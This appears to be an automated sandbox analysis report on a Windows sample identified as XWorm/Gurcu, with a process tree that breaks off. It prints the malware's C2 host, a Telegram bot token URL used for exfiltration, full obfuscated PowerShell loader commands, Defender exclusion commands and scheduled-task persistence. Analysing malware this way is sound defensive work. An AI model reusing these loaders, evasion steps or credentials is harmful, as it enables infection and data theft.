Analysis

max time kernel: 143s
max time network: 151s
platform: windows10-2004_x64
resource: win10v2004-20240802-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
submitted: 07-08-2024 14:45

Static task: static1
Behavioral task: behavioral1
Sample: fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe
Resource: win7-20240708-en
General

Target: fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe
Size: 19.2MB
MD5: aa4bb4c57074e543076b145b7399cd64
SHA1: 5e36e64cc686fa553b43d1c274d1a15e18b50501
SHA256: fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7
SHA512: ff38fc85d51fda9d32668949d2f67074be1e52cb6d63978155347173452199687935b9e96d3a060c7ab74461c5f4228b2c4cf8a0486ca5bbd9ea962a1c16c5eb
SSDEEP: 393216:0W7LVQgX47mXZGbWVQjFLICQA122lrL8jiQIthY4eqfIgUJzM8/bX9Wwy:NBfXZGbBjFLICB1hUji1tWbZT9W/
Malware Config

Extracted
  Family: xworm
  floor-talked.gl.at.ply.gg:52348
  Install_directory: %AppData%
  install_file: processor.exe
  telegram: https://api.telegram.org/bot6944368626:AAEvUk2RtxxeA2BAieiHfX1ijoOaWr__RyY/sendMessage?chat_id=6270056635

Extracted
  Family: gurcu
  https://api.telegram.org/bot6944368626:AAEvUk2RtxxeA2BAieiHfX1ijoOaWr__RyY/sendMessage?chat_id=6270056635
Signatures

Detect Xworm Payload (1 IoC)
  resource                                                                      yara_rule
  behavioral2/memory/2956-223-0x00000198D7B30000-0x00000198D7B46000-memory.dmp  family_xworm
Blocklisted process makes network request (13 IoCs)
  flow  pid   Process
  14    4296  powershell.exe
  16    2956  powershell.exe
  33    2956  powershell.exe
  34    4296  powershell.exe
  35    4296  powershell.exe
  40    2956  powershell.exe
  41    4296  powershell.exe
  42    2956  powershell.exe
  48    4296  powershell.exe
  49    2956  powershell.exe
  50    4296  powershell.exe
  51    2956  powershell.exe
  52    4296  powershell.exe
Command and Scripting Interpreter: PowerShell (1 TTP, 16 IoCs)
Runs PowerShell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
  pid   Process
  4116  powershell.exe
  2564  powershell.exe
  4744  powershell.exe
  1340  powershell.exe
  2652  powershell.exe
  3976  powershell.exe
  2476  powershell.exe
  5088  powershell.exe
  228   powershell.exe
  3548  powershell.exe
  4844  powershell.exe
  2956  powershell.exe
  1800  powershell.exe
  456   powershell.exe
  2744  powershell.exe
  4296  powershell.exe
Sets file to hidden (1 TTP, 2 IoCs)
Modifies file attributes to stop it showing in Explorer etc.
  pid   Process
  4084  attrib.exe
  4992  attrib.exe
Checks computer location settings (2 TTPs, 6 IoCs)
Looks up country code configured in the registry, likely geofence.
  description        ioc                                                                                             Process
  Key value queried  \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation  fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe
  Key value queried  \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation  S500RAT.exe
  Key value queried  \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation  WScript.exe
  Key value queried  \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation  WScript.exe
  Key value queried  \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation  WScript.exe
  Key value queried  \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation  WScript.exe
Drops startup file (2 IoCs)
  description                    ioc                                                                                    Process
  File opened for modification   C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\processor.lnk  powershell.exe
  File created                   C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\processor.lnk  powershell.exe
Executes dropped EXE (3 IoCs)
  pid   Process
  4300  S500RAT.exe
  3172  S500RAT.exe
  1548  system.exe
Adds Run key to start application (2 TTPs, 1 IoC)
  description      ioc                                                                                                                  Process
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\system\\system.exe\""  powershell.exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
Delays execution with timeout.exe (1 IoC)
  pid   Process
  4752  timeout.exe
Modifies registry class (4 IoCs)
  description  ioc                                                                        Process
  Key created  \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings  powershell.exe
  Key created  \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings  powershell.exe
  Key created  \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings  powershell.exe
  Key created  \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings  powershell.exe
Suspicious behavior: AddClipboardFormatListener (1 IoC)
  pid   Process
  2956  powershell.exe
Suspicious behavior: EnumeratesProcesses (64 IoCs)
  pid   Process
  4116  powershell.exe
  4116  powershell.exe
  2564  powershell.exe
  2564  powershell.exe
  2652  powershell.exe
  4744  powershell.exe
  2652  powershell.exe
  4744  powershell.exe
  3976  powershell.exe
  3976  powershell.exe
  1340  powershell.exe
  1340  powershell.exe
  2476  powershell.exe
  5088  powershell.exe
  5088  powershell.exe
  2476  powershell.exe
  2476  powershell.exe
  5088  powershell.exe
  228   powershell.exe
  228   powershell.exe
  228   powershell.exe
  1800  powershell.exe
  1800  powershell.exe
  1800  powershell.exe
  456   powershell.exe
  456   powershell.exe
  456   powershell.exe
  3548  powershell.exe
  3548  powershell.exe
  3548  powershell.exe
  4844  powershell.exe
  4844  powershell.exe
  4844  powershell.exe
  3548  powershell.exe
  3548  powershell.exe
  3548  powershell.exe
  3548  powershell.exe
  3548  powershell.exe
  3548  powershell.exe
  3548  powershell.exe
  3548  powershell.exe
  3548  powershell.exe
  3548  powershell.exe
  3548  powershell.exe
  3548  powershell.exe
  3548  powershell.exe
  3548  powershell.exe
  3548  powershell.exe
  3548  powershell.exe
  3548  powershell.exe
  2956  powershell.exe
  2956  powershell.exe
  2956  powershell.exe
  3548  powershell.exe
  3548  powershell.exe
  3548  powershell.exe
  3548  powershell.exe
  2744  powershell.exe
  2744  powershell.exe
  2744  powershell.exe
  4296  powershell.exe
  4296  powershell.exe
  4296  powershell.exe
  4296  powershell.exe
Suspicious use of AdjustPrivilegeToken (64 IoCs)
  description                          pid   Process
  Token: SeDebugPrivilege              4116  powershell.exe
  Token: SeDebugPrivilege              2564  powershell.exe
  Token: SeDebugPrivilege              2652  powershell.exe
  Token: SeDebugPrivilege              4744  powershell.exe
  Token: SeDebugPrivilege              3976  powershell.exe
  Token: SeDebugPrivilege              1340  powershell.exe
  Token: SeDebugPrivilege              2476  powershell.exe
  Token: SeDebugPrivilege              5088  powershell.exe
  Token: SeIncreaseQuotaPrivilege      2476  powershell.exe
  Token: SeSecurityPrivilege           2476  powershell.exe
  Token: SeTakeOwnershipPrivilege      2476  powershell.exe
  Token: SeLoadDriverPrivilege         2476  powershell.exe
  Token: SeSystemProfilePrivilege      2476  powershell.exe
  Token: SeSystemtimePrivilege         2476  powershell.exe
  Token: SeProfSingleProcessPrivilege  2476  powershell.exe
  Token: SeIncBasePriorityPrivilege    2476  powershell.exe
  Token: SeCreatePagefilePrivilege     2476  powershell.exe
  Token: SeBackupPrivilege             2476  powershell.exe
  Token: SeRestorePrivilege            2476  powershell.exe
  Token: SeShutdownPrivilege           2476  powershell.exe
  Token: SeDebugPrivilege              2476  powershell.exe
  Token: SeSystemEnvironmentPrivilege  2476  powershell.exe
  Token: SeRemoteShutdownPrivilege     2476  powershell.exe
  Token: SeUndockPrivilege             2476  powershell.exe
  Token: SeManageVolumePrivilege       2476  powershell.exe
  Token: 33                            2476  powershell.exe
  Token: 34                            2476  powershell.exe
  Token: 35                            2476  powershell.exe
  Token: 36                            2476  powershell.exe
  Token: SeIncreaseQuotaPrivilege      5088  powershell.exe
  Token: SeSecurityPrivilege           5088  powershell.exe
  Token: SeTakeOwnershipPrivilege      5088  powershell.exe
  Token: SeLoadDriverPrivilege         5088  powershell.exe
  Token: SeSystemProfilePrivilege      5088  powershell.exe
  Token: SeSystemtimePrivilege         5088  powershell.exe
  Token: SeProfSingleProcessPrivilege  5088  powershell.exe
  Token: SeIncBasePriorityPrivilege    5088  powershell.exe
  Token: SeCreatePagefilePrivilege     5088  powershell.exe
  Token: SeBackupPrivilege             5088  powershell.exe
  Token: SeRestorePrivilege            5088  powershell.exe
  Token: SeShutdownPrivilege           5088  powershell.exe
  Token: SeDebugPrivilege              5088  powershell.exe
  Token: SeSystemEnvironmentPrivilege  5088  powershell.exe
  Token: SeRemoteShutdownPrivilege     5088  powershell.exe
  Token: SeUndockPrivilege             5088  powershell.exe
  Token: SeManageVolumePrivilege       5088  powershell.exe
  Token: 33                            5088  powershell.exe
  Token: 34                            5088  powershell.exe
  Token: 35                            5088  powershell.exe
  Token: 36                            5088  powershell.exe
  Token: SeIncreaseQuotaPrivilege      5088  powershell.exe
  Token: SeSecurityPrivilege           5088  powershell.exe
  Token: SeTakeOwnershipPrivilege      5088  powershell.exe
  Token: SeLoadDriverPrivilege         5088  powershell.exe
  Token: SeSystemProfilePrivilege      5088  powershell.exe
  Token: SeSystemtimePrivilege         5088  powershell.exe
  Token: SeProfSingleProcessPrivilege  5088  powershell.exe
  Token: SeIncBasePriorityPrivilege    5088  powershell.exe
  Token: SeCreatePagefilePrivilege     5088  powershell.exe
  Token: SeBackupPrivilege             5088  powershell.exe
  Token: SeRestorePrivilege            5088  powershell.exe
  Token: SeShutdownPrivilege           5088  powershell.exe
  Token: SeDebugPrivilege              5088  powershell.exe
  Token: SeSystemEnvironmentPrivilege  5088  powershell.exe
Suspicious use of SetWindowsHookEx (1 IoC)
  pid   Process
  2956  powershell.exe
Suspicious use of WriteProcessMemory (64 IoCs)
  description                        pid   Process                                                                 procid_target
  PID 3380 wrote to memory of 4300   3380  fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe  86
  PID 3380 wrote to memory of 4300   3380  fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe  86
  PID 3380 wrote to memory of 4116   3380  fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe  87
  PID 3380 wrote to memory of 4116   3380  fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe  87
  PID 3380 wrote to memory of 1028   3380  fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe  89
  PID 3380 wrote to memory of 1028   3380  fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe  89
  PID 3380 wrote to memory of 2564   3380  fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe  91
  PID 3380 wrote to memory of 2564   3380  fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe  91
  PID 4300 wrote to memory of 3172   4300  S500RAT.exe                                                             93
  PID 4300 wrote to memory of 3172   4300  S500RAT.exe                                                             93
  PID 4300 wrote to memory of 4744   4300  S500RAT.exe                                                             94
  PID 4300 wrote to memory of 4744   4300  S500RAT.exe                                                             94
  PID 1028 wrote to memory of 2652   1028  cmd.exe                                                                 96
  PID 1028 wrote to memory of 2652   1028  cmd.exe                                                                 96
  PID 3380 wrote to memory of 4552   3380  fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe  97
  PID 3380 wrote to memory of 4552   3380  fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe  97
  PID 4552 wrote to memory of 3976   4552  cmd.exe                                                                 99
  PID 4552 wrote to memory of 3976   4552  cmd.exe                                                                 99
  PID 4300 wrote to memory of 2124   4300  S500RAT.exe                                                             100
  PID 4300 wrote to memory of 2124   4300  S500RAT.exe                                                             100
  PID 4300 wrote to memory of 1340   4300  S500RAT.exe                                                             102
  PID 4300 wrote to memory of 1340   4300  S500RAT.exe                                                             102
  PID 4300 wrote to memory of 4788   4300  S500RAT.exe                                                             105
  PID 4300 wrote to memory of 4788   4300  S500RAT.exe                                                             105
  PID 3976 wrote to memory of 2476   3976  powershell.exe                                                          107
  PID 3976 wrote to memory of 2476   3976  powershell.exe                                                          107
  PID 2652 wrote to memory of 5088   2652  powershell.exe                                                          109
  PID 2652 wrote to memory of 5088   2652  powershell.exe                                                          109
  PID 3976 wrote to memory of 3028   3976  powershell.exe                                                          111
  PID 3976 wrote to memory of 3028   3976  powershell.exe                                                          111
  PID 2652 wrote to memory of 800    2652  powershell.exe                                                          112
  PID 2652 wrote to memory of 800    2652  powershell.exe                                                          112
  PID 800 wrote to memory of 976     800   WScript.exe                                                             113
  PID 800 wrote to memory of 976     800   WScript.exe                                                             113
  PID 3028 wrote to memory of 4864   3028  WScript.exe                                                             114
  PID 3028 wrote to memory of 4864   3028  WScript.exe                                                             114
  PID 2124 wrote to memory of 228    2124  cmd.exe                                                                 117
  PID 2124 wrote to memory of 228    2124  cmd.exe                                                                 117
  PID 228 wrote to memory of 1800    228   powershell.exe                                                          118
  PID 228 wrote to memory of 1800    228   powershell.exe                                                          118
  PID 228 wrote to memory of 956     228   powershell.exe                                                          120
  PID 228 wrote to memory of 956     228   powershell.exe                                                          120
  PID 956 wrote to memory of 4952    956   WScript.exe                                                             121
  PID 956 wrote to memory of 4952    956   WScript.exe                                                             121
  PID 4788 wrote to memory of 456    4788  cmd.exe                                                                 123
  PID 4788 wrote to memory of 456    4788  cmd.exe                                                                 123
  PID 4864 wrote to memory of 3548   4864  cmd.exe                                                                 124
  PID 4864 wrote to memory of 3548   4864  cmd.exe                                                                 124
  PID 456 wrote to memory of 4844    456   powershell.exe                                                          125
  PID 456 wrote to memory of 4844    456   powershell.exe                                                          125
  PID 976 wrote to memory of 2956    976   cmd.exe                                                                 127
  PID 976 wrote to memory of 2956    976   cmd.exe                                                                 127
  PID 456 wrote to memory of 2984    456   powershell.exe                                                          128
  PID 456 wrote to memory of 2984    456   powershell.exe                                                          128
  PID 2984 wrote to memory of 1488   2984  WScript.exe                                                             129
  PID 2984 wrote to memory of 1488   2984  WScript.exe                                                             129
  PID 3548 wrote to memory of 4084   3548  powershell.exe                                                          131
  PID 3548 wrote to memory of 4084   3548  powershell.exe                                                          131
  PID 3548 wrote to memory of 4992   3548  powershell.exe                                                          133
  PID 3548 wrote to memory of 4992   3548  powershell.exe                                                          133
  PID 4952 wrote to memory of 2744   4952  cmd.exe                                                                 135
  PID 4952 wrote to memory of 2744   4952  cmd.exe                                                                 135
  PID 1488 wrote to memory of 4296   1488  cmd.exe                                                                 136
  PID 1488 wrote to memory of 4296   1488  cmd.exe                                                                 136
Views/modifies file attributes (1 TTP, 2 IoCs)
  pid   Process
  4992  attrib.exe
  4084  attrib.exe
Processes

[depth 1] C:\Users\Admin\AppData\Local\Temp\fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID: 3380
  [depth 2] C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID: 4300
    [depth 3] C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
      - Executes dropped EXE
      PID: 3172
    [depth 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\invoicer.bat'
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 4744
    [depth 3] C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\invoicer.bat" "
      - Suspicious use of WriteProcessMemory
      PID: 2124
      [depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('X7Zhl6Khi2ZbZn4/PrAf+8sGbyoXniPMQQRnCuRZwU4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FTiKRMGfSm1nLSyYBeX8aQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VWgzw=New-Object System.IO.MemoryStream(,$param_var); $qruKH=New-Object System.IO.MemoryStream; $RPpcy=New-Object System.IO.Compression.GZipStream($VWgzw, [IO.Compression.CompressionMode]::Decompress); $RPpcy.CopyTo($qruKH); $RPpcy.Dispose(); $VWgzw.Dispose(); $qruKH.Dispose(); $qruKH.ToArray();}function execute_function($param_var,$param2_var){ $kflaA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sDziU=$kflaA.EntryPoint; $sDziU.Invoke($null, $param2_var);}$gEOgE = 'C:\Users\Admin\AppData\Local\Temp\invoicer.bat';$host.UI.RawUI.WindowTitle = $gEOgE;$nkdNJ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($gEOgE).Split([Environment]::NewLine);foreach ($inqUq in $nkdNJ) { if ($inqUq.StartsWith(':: ')) { $KTGgd=$inqUq.Substring(3); break; }}$payloads_var=[string[]]$KTGgd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        - Command and Scripting Interpreter: PowerShell
        - Modifies registry class
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of WriteProcessMemory
        PID: 228
        [depth 5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_166_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_166.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          PID: 1800
        [depth 5] C:\Windows\System32\WScript.exe
          Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_166.vbs"
          - Checks computer location settings
          - Suspicious use of WriteProcessMemory
          PID: 956
          [depth 6] C:\Windows\system32\cmd.exe
            Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_166.bat" "
            - Suspicious use of WriteProcessMemory
            PID: 4952
            [depth 7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('X7Zhl6Khi2ZbZn4/PrAf+8sGbyoXniPMQQRnCuRZwU4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FTiKRMGfSm1nLSyYBeX8aQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VWgzw=New-Object System.IO.MemoryStream(,$param_var); $qruKH=New-Object System.IO.MemoryStream; $RPpcy=New-Object System.IO.Compression.GZipStream($VWgzw, [IO.Compression.CompressionMode]::Decompress); $RPpcy.CopyTo($qruKH); $RPpcy.Dispose(); $VWgzw.Dispose(); $qruKH.Dispose(); $qruKH.ToArray();}function execute_function($param_var,$param2_var){ $kflaA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sDziU=$kflaA.EntryPoint; $sDziU.Invoke($null, $param2_var);}$gEOgE = 'C:\Users\Admin\AppData\Roaming\startup_str_166.bat';$host.UI.RawUI.WindowTitle = $gEOgE;$nkdNJ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($gEOgE).Split([Environment]::NewLine);foreach ($inqUq in $nkdNJ) { if ($inqUq.StartsWith(':: ')) { $KTGgd=$inqUq.Substring(3); break; }}$payloads_var=[string[]]$KTGgd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
              - Command and Scripting Interpreter: PowerShell
              - Suspicious behavior: EnumeratesProcesses
              PID: 2744
    [depth 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat'
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 1340
    [depth 3] C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat" "
      - Suspicious use of WriteProcessMemory
      PID: 4788
      [depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8PMom9RnlfWzjG8MC5lXaac8aBGu+w5gW8NmRz9Kk+g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Q3K43OSBcYlntcFGSbtNow=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YujPS=New-Object System.IO.MemoryStream(,$param_var); $WQOly=New-Object System.IO.MemoryStream; $xgIaW=New-Object System.IO.Compression.GZipStream($YujPS, [IO.Compression.CompressionMode]::Decompress); $xgIaW.CopyTo($WQOly); $xgIaW.Dispose(); $YujPS.Dispose(); $WQOly.Dispose(); $WQOly.ToArray();}function execute_function($param_var,$param2_var){ $zVSXB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $RyFSy=$zVSXB.EntryPoint; $RyFSy.Invoke($null, $param2_var);}$tIIDK = 'C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat';$host.UI.RawUI.WindowTitle = $tIIDK;$KlFzN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tIIDK).Split([Environment]::NewLine);foreach ($XYyBu in $KlFzN) { if ($XYyBu.StartsWith(':: ')) { $JQyvV=$XYyBu.Substring(3); break; }}$payloads_var=[string[]]$JQyvV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        - Command and Scripting Interpreter: PowerShell
        - Modifies registry class
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of WriteProcessMemory
        PID: 456
        [depth 5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_58_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_58.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          PID: 4844
        [depth 5] C:\Windows\System32\WScript.exe
          Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_58.vbs"
          - Checks computer location settings
          - Suspicious use of WriteProcessMemory
          PID: 2984
          [depth 6] C:\Windows\system32\cmd.exe
            Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_58.bat" "
            - Suspicious use of WriteProcessMemory
            PID: 1488
            [depth 7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8PMom9RnlfWzjG8MC5lXaac8aBGu+w5gW8NmRz9Kk+g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Q3K43OSBcYlntcFGSbtNow=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YujPS=New-Object System.IO.MemoryStream(,$param_var); $WQOly=New-Object System.IO.MemoryStream; $xgIaW=New-Object System.IO.Compression.GZipStream($YujPS, [IO.Compression.CompressionMode]::Decompress); $xgIaW.CopyTo($WQOly); $xgIaW.Dispose(); $YujPS.Dispose(); $WQOly.Dispose(); $WQOly.ToArray();}function execute_function($param_var,$param2_var){ $zVSXB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $RyFSy=$zVSXB.EntryPoint; $RyFSy.Invoke($null, $param2_var);}$tIIDK = 'C:\Users\Admin\AppData\Roaming\startup_str_58.bat';$host.UI.RawUI.WindowTitle = $tIIDK;$KlFzN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tIIDK).Split([Environment]::NewLine);foreach ($XYyBu in $KlFzN) { if ($XYyBu.StartsWith(':: ')) { $JQyvV=$XYyBu.Substring(3); break; }}$payloads_var=[string[]]$JQyvV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
              - Blocklisted process makes network request
              - Command and Scripting Interpreter: PowerShell
              - Suspicious behavior: EnumeratesProcesses
              PID: 4296
  [depth 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\invoicer.bat'
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 4116
  [depth 2] C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\invoicer.bat" "
    - Suspicious use of WriteProcessMemory
    PID: 1028
    [depth 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
